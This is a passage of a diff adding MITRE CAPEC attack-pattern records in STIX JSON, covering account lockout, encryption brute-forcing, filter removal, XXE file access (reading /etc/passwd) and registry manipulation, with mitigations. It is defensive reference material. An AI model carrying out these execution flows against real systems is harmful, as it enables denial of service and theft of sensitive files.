"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b5fa953-0ec5-48c2-b9a3-ea2461650cf6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bcece01-19c2-465b-9658-461bae9bfd35", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", + "id": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8be86371-e989-4042-af5b-bfd78a42085f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b307ad0c-ae60-4f03-a5fb-26f4499dc18d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform output validation for all remote content.", + "id": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba695a24-c9fb-4c8a-9012-dc3b1068ec38", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disable scripting languages such as JavaScript in browser", + "id": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1488d37a-9c10-49ea-bce3-d8270b3b9d2f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3584936-9e95-48a5-bcca-77b2c2f44e5a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", + "external_references": [ + { + "external_id": "CAPEC-2", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/2.html" + }, + { + "external_id": "CWE-645", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/645.html" + }, + { + "description": "Account Access Removal", + "external_id": "T1531", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1531" + } + ], + "id": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Inducing Account Lockout", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout

    2. Techniques
    Analyze system documentation to find list of events that could potentially cause account lockout
    Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
    Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.

  2. Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out

    3. Techniques
    Obtain list of authorized users using another attack pattern, such as SQL Injection.
    Attempt to create accounts if possible; system should indicate if a user ID is already taken.
    Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

Exploit

  1. Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out.

    2. Techniques
    For each user ID to be locked out, perform the lockout procedure discovered in the first step.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system has a lockout mechanism.", + "An attacker must be able to reproduce behavior that would result in an account being locked." + ], + "x_capec_resources_required": [ + "Computer with access to the login portion of the target system" + ], + "x_capec_skills_required": { + "Low": "No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", + "id": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e9e6ff-2250-40b7-b5c7-26510e85245f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and made to turn on themselves.", + "id": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", + "external_references": [ + { + "external_id": "CAPEC-20", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + } + ], + "id": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Encryption Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the ciphertext and the encryption algorithm.

Experiment

  1. Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Ciphertext is known.", + "Encryption algorithm and key size are known." + ], + "x_capec_resources_required": [ + "\n A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).\n On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.\n Obviously as N gets large the brute force approach becomes infeasible.\n " + ], + "x_capec_skills_required": { + "Low": "Brute forcing encryption does not require much skill." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--439ff02b-9273-4b92-9c82-0a6912ef0dc7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", + "id": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--24444738-98cb-4371-b7e9-aba1bd3d11ad", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "spec_version": "2.1", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content.", + "external_references": [ + { + "external_id": "CAPEC-200", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/200.html" + } + ], + "id": "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Removal of filters: Input filters, output filters, data masking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information.\n For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records.\n This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.\n ", + "x_capec_prerequisites": [ + "The target application must utilize some sort of filtering mechanism (input, output, or data masking)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.", + "external_references": [ + { + "external_id": "CAPEC-201", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "XXE (Xml eXternal Entity) Attack, Beyond Security", + "external_id": "REF-73", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securitynews/6D0100A5PU.html" + }, + { + "description": "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection", + "external_id": "REF-74", + "source_name": "reference_from_CAPEC", + "url": "http://scary.beasts.org/security/CESA-2007-002.html" + } + ], + "id": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data External Linking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n ", + "\n The following XML snippet would attempt to open the /etc/passwd file:\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.

    2. Techniques
    Use an automated tool to record all instances of URLs that process requests with serialized data.
    Use a browser to manually explore the website and analyze how the application processes serialized data requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious data message that contains references to sensitive files.

  2. Launch an External Linking attack: Send the malicious crafted message containing the reference to a sensitive file to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must follow external data references without validating the validity of the reference target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send serialized data messages with maliciously crafted schema." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure the serialized data processor to only retrieve external entities from trusted sources.", + "id": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-201-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d8b8b0b-8f2d-4cfd-a9fa-dd14e071f340", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", + "external_references": [ + { + "external_id": "CAPEC-203", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/203.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Modify Registry", + "external_id": "T1112", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1112" + }, + { + "description": "Plist Modification", + "external_id": "T1647", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1647" + } + ], + "id": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulate Registry Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b" + ], + "x_capec_prerequisites": [ + "The targeted application must rely on values stored in a registry.", + "The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 